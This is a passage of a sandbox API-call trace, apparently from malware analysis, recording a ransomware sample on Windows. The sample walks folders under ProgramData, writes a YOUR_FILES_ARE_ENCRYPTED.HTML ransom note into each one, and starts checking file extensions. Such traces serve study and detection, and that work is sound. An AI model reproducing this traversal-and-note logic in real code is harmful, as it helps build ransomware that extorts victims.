out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf9e978d9, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xf9ebda38, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0xf9ebda38, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Task", cAlternateFileName="")) returned 0 [0156.789] FindClose (in: hFindFile=0x42f3140 | out: hFindFile=0x42f3140) returned 1 [0156.789] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 71 [0156.789] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\device stage\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4a8 [0156.789] WriteFile (in: hFile=0x4a8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe12c, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe12c*=0x3c00, lpOverlapped=0x0) returned 1 [0156.791] CloseHandle (hObject=0x4a8) returned 1 [0156.791] GetProcessHeap () returned 0x270000 [0156.792] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75e0048 | out: hHeap=0x270000) returned 1 [0156.796] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9f09cf6, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xf9f09cf6, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x8a6f8efe, ftLastWriteTime.dwHighDateTime=0x1ca0427, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="DeviceSync", cAlternateFileName="DEVICE~2")) returned 1 [0156.796] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\DeviceSync") returned 39 [0156.797] GetProcessHeap () returned 0x270000 [0156.797] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75e0048 [0156.798] lstrcpyW (in: lpString1=0x75e0048, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\DeviceSync" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\DeviceSync") returned="\\\\?\\C:\\ProgramData\\Microsoft\\DeviceSync" [0156.798] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\DeviceSync", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\DeviceSync\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\DeviceSync\\*" [0156.798] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\DeviceSync\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9f09cf6, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xf9f09cf6, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x8a6f8efe, ftLastWriteTime.dwHighDateTime=0x1ca0427, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3140 [0156.799] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9f09cf6, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xf9f09cf6, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x8a6f8efe, ftLastWriteTime.dwHighDateTime=0x1ca0427, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0156.799] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9f09cf6, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xf9f09cf6, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x8a6f8efe, ftLastWriteTime.dwHighDateTime=0x1ca0427, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 0 [0156.799] FindClose (in: hFindFile=0x42f3140 | out: hFindFile=0x42f3140) returned 1 [0156.799] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\DeviceSync\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 69 [0156.800] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\DeviceSync\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\devicesync\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4a8 [0156.800] WriteFile (in: hFile=0x4a8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe12c, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe12c*=0x3c00, lpOverlapped=0x0) returned 1 [0156.802] CloseHandle (hObject=0x4a8) returned 1 [0156.802] GetProcessHeap () returned 0x270000 [0156.803] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75e0048 | out: hHeap=0x270000) returned 1 [0156.803] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf9f09cf6, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xf9f09cf6, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0xf9f09cf6, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="DRM", cAlternateFileName="")) returned 1 [0156.803] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\DRM") returned 32 [0156.803] GetProcessHeap () returned 0x270000 [0156.803] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75e0048 [0156.803] lstrcpyW (in: lpString1=0x75e0048, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\DRM" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\DRM") returned="\\\\?\\C:\\ProgramData\\Microsoft\\DRM" [0156.803] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\DRM", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\DRM\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\DRM\\*" [0156.803] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\DRM\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf9f09cf6, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xf9f09cf6, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0xf9f09cf6, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3140 [0156.804] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf9f09cf6, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xf9f09cf6, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0xf9f09cf6, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0156.804] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xf9f09cf6, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xf9f09cf6, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x6fb1a7ba, ftLastWriteTime.dwHighDateTime=0x1ca0427, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Server", cAlternateFileName="")) returned 1 [0156.804] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\DRM\\Server") returned 39 [0156.804] GetProcessHeap () returned 0x270000 [0156.804] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75f0050 [0156.805] lstrcpyW (in: lpString1=0x75f0050, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\DRM\\Server" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\DRM\\Server") returned="\\\\?\\C:\\ProgramData\\Microsoft\\DRM\\Server" [0156.805] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\DRM\\Server", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\DRM\\Server\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\DRM\\Server\\*" [0156.805] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\DRM\\Server\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xf9f09cf6, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xf9f09cf6, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x6fb1a7ba, ftLastWriteTime.dwHighDateTime=0x1ca0427, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0156.805] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xf9f09cf6, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xf9f09cf6, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x6fb1a7ba, ftLastWriteTime.dwHighDateTime=0x1ca0427, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0156.805] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xf9f09cf6, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xf9f09cf6, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x6fb1a7ba, ftLastWriteTime.dwHighDateTime=0x1ca0427, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 0 [0156.805] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0156.805] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\DRM\\Server\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 69 [0156.805] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\DRM\\Server\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\drm\\server\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x58c [0156.805] WriteFile (in: hFile=0x58c, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebde20, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebde20*=0x3c00, lpOverlapped=0x0) returned 1 [0156.807] CloseHandle (hObject=0x58c) returned 1 [0156.808] GetProcessHeap () returned 0x270000 [0156.809] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75f0050 | out: hHeap=0x270000) returned 1 [0156.809] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xf9f09cf6, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xf9f09cf6, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x6fb1a7ba, ftLastWriteTime.dwHighDateTime=0x1ca0427, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Server", cAlternateFileName="")) returned 0 [0156.809] FindClose (in: hFindFile=0x42f3140 | out: hFindFile=0x42f3140) returned 1 [0156.809] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\DRM\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 62 [0156.809] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\DRM\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\drm\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4a8 [0156.809] WriteFile (in: hFile=0x4a8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe12c, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe12c*=0x3c00, lpOverlapped=0x0) returned 1 [0156.811] CloseHandle (hObject=0x4a8) returned 1 [0156.811] GetProcessHeap () returned 0x270000 [0156.812] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75e0048 | out: hHeap=0x270000) returned 1 [0156.812] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xc371f54c, ftCreationTime.dwHighDateTime=0x1cbf8b8, ftLastAccessTime.dwLowDateTime=0xd95e54e0, ftLastAccessTime.dwHighDateTime=0x1cbf8b8, ftLastWriteTime.dwLowDateTime=0xc371f54c, ftLastWriteTime.dwHighDateTime=0x1cbf8b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="eHome", cAlternateFileName="")) returned 1 [0156.812] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\eHome") returned 34 [0156.812] GetProcessHeap () returned 0x270000 [0156.812] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75e0048 [0156.812] lstrcpyW (in: lpString1=0x75e0048, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\eHome" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\eHome") returned="\\\\?\\C:\\ProgramData\\Microsoft\\eHome" [0156.812] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\eHome", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\eHome\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\eHome\\*" [0156.812] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\eHome\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xc371f54c, ftCreationTime.dwHighDateTime=0x1cbf8b8, ftLastAccessTime.dwLowDateTime=0xd95e54e0, ftLastAccessTime.dwHighDateTime=0x1cbf8b8, ftLastWriteTime.dwLowDateTime=0xc371f54c, ftLastWriteTime.dwHighDateTime=0x1cbf8b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3140 [0156.813] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xc371f54c, ftCreationTime.dwHighDateTime=0x1cbf8b8, ftLastAccessTime.dwLowDateTime=0xd95e54e0, ftLastAccessTime.dwHighDateTime=0x1cbf8b8, ftLastWriteTime.dwLowDateTime=0xc371f54c, ftLastWriteTime.dwHighDateTime=0x1cbf8b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0156.813] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xc371f54c, ftCreationTime.dwHighDateTime=0x1cbf8b8, ftLastAccessTime.dwLowDateTime=0xd95e54e0, ftLastAccessTime.dwHighDateTime=0x1cbf8b8, ftLastWriteTime.dwLowDateTime=0xc371f54c, ftLastWriteTime.dwHighDateTime=0x1cbf8b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="logs", cAlternateFileName="")) returned 1 [0156.813] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\eHome\\logs") returned 39 [0156.813] GetProcessHeap () returned 0x270000 [0156.813] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75f0050 [0156.813] lstrcpyW (in: lpString1=0x75f0050, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\eHome\\logs" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\eHome\\logs") returned="\\\\?\\C:\\ProgramData\\Microsoft\\eHome\\logs" [0156.813] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\eHome\\logs", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\eHome\\logs\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\eHome\\logs\\*" [0156.813] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\eHome\\logs\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xc371f54c, ftCreationTime.dwHighDateTime=0x1cbf8b8, ftLastAccessTime.dwLowDateTime=0xd95e54e0, ftLastAccessTime.dwHighDateTime=0x1cbf8b8, ftLastWriteTime.dwLowDateTime=0xc371f54c, ftLastWriteTime.dwHighDateTime=0x1cbf8b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0156.813] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xc371f54c, ftCreationTime.dwHighDateTime=0x1cbf8b8, ftLastAccessTime.dwLowDateTime=0xd95e54e0, ftLastAccessTime.dwHighDateTime=0x1cbf8b8, ftLastWriteTime.dwLowDateTime=0xc371f54c, ftLastWriteTime.dwHighDateTime=0x1cbf8b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0156.813] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xc371f54c, ftCreationTime.dwHighDateTime=0x1cbf8b8, ftLastAccessTime.dwLowDateTime=0xd95e54e0, ftLastAccessTime.dwHighDateTime=0x1cbf8b8, ftLastWriteTime.dwLowDateTime=0xc371f54c, ftLastWriteTime.dwHighDateTime=0x1cbf8b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 0 [0156.813] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0156.814] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\eHome\\logs\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 69 [0156.814] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\eHome\\logs\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\ehome\\logs\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x58c [0156.814] WriteFile (in: hFile=0x58c, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebde20, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebde20*=0x3c00, lpOverlapped=0x0) returned 1 [0156.816] CloseHandle (hObject=0x58c) returned 1 [0156.816] GetProcessHeap () returned 0x270000 [0156.817] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75f0050 | out: hHeap=0x270000) returned 1 [0156.817] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xc371f54c, ftCreationTime.dwHighDateTime=0x1cbf8b8, ftLastAccessTime.dwLowDateTime=0xd95e54e0, ftLastAccessTime.dwHighDateTime=0x1cbf8b8, ftLastWriteTime.dwLowDateTime=0xc371f54c, ftLastWriteTime.dwHighDateTime=0x1cbf8b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="logs", cAlternateFileName="")) returned 0 [0156.817] FindClose (in: hFindFile=0x42f3140 | out: hFindFile=0x42f3140) returned 1 [0156.817] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\eHome\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 64 [0156.817] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\eHome\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\ehome\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4a8 [0156.818] WriteFile (in: hFile=0x4a8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe12c, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe12c*=0x3c00, lpOverlapped=0x0) returned 1 [0156.819] CloseHandle (hObject=0x4a8) returned 1 [0156.820] GetProcessHeap () returned 0x270000 [0156.821] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75e0048 | out: hHeap=0x270000) returned 1 [0156.821] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9f09cf6, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xf9f09cf6, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0xf9f09cf6, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="IdentityCRL", cAlternateFileName="IDENTI~1")) returned 1 [0156.821] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL") returned 40 [0156.821] GetProcessHeap () returned 0x270000 [0156.821] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75e0048 [0156.821] lstrcpyW (in: lpString1=0x75e0048, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL") returned="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL" [0156.821] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\*" [0156.821] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9f09cf6, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xf9f09cf6, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0xf9f09cf6, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3140 [0156.822] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9f09cf6, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xf9f09cf6, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0xf9f09cf6, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0156.822] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x88a4265f, ftCreationTime.dwHighDateTime=0x1ca0427, ftLastAccessTime.dwLowDateTime=0x88a4265f, ftLastAccessTime.dwHighDateTime=0x1ca0427, ftLastWriteTime.dwLowDateTime=0x9fd2229c, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0x3d00, dwReserved0=0x0, dwReserved1=0x60, cFileName="ppcrlconfig.dll", cAlternateFileName="PPCRLC~1.DLL")) returned 1 [0156.822] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\IdentityCRL\\ppcrlconfig.dll") returned 56 [0156.822] lstrcmpW (lpString1="ppcrlconfig.dll", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0156.822] PathFindExtensionW (pszPath="ppcrlconfig.dll") returned=".dll" [0156.822] lstrlenW (lpString=".dll") returned 4 [0156.822] PathFindExtensionW 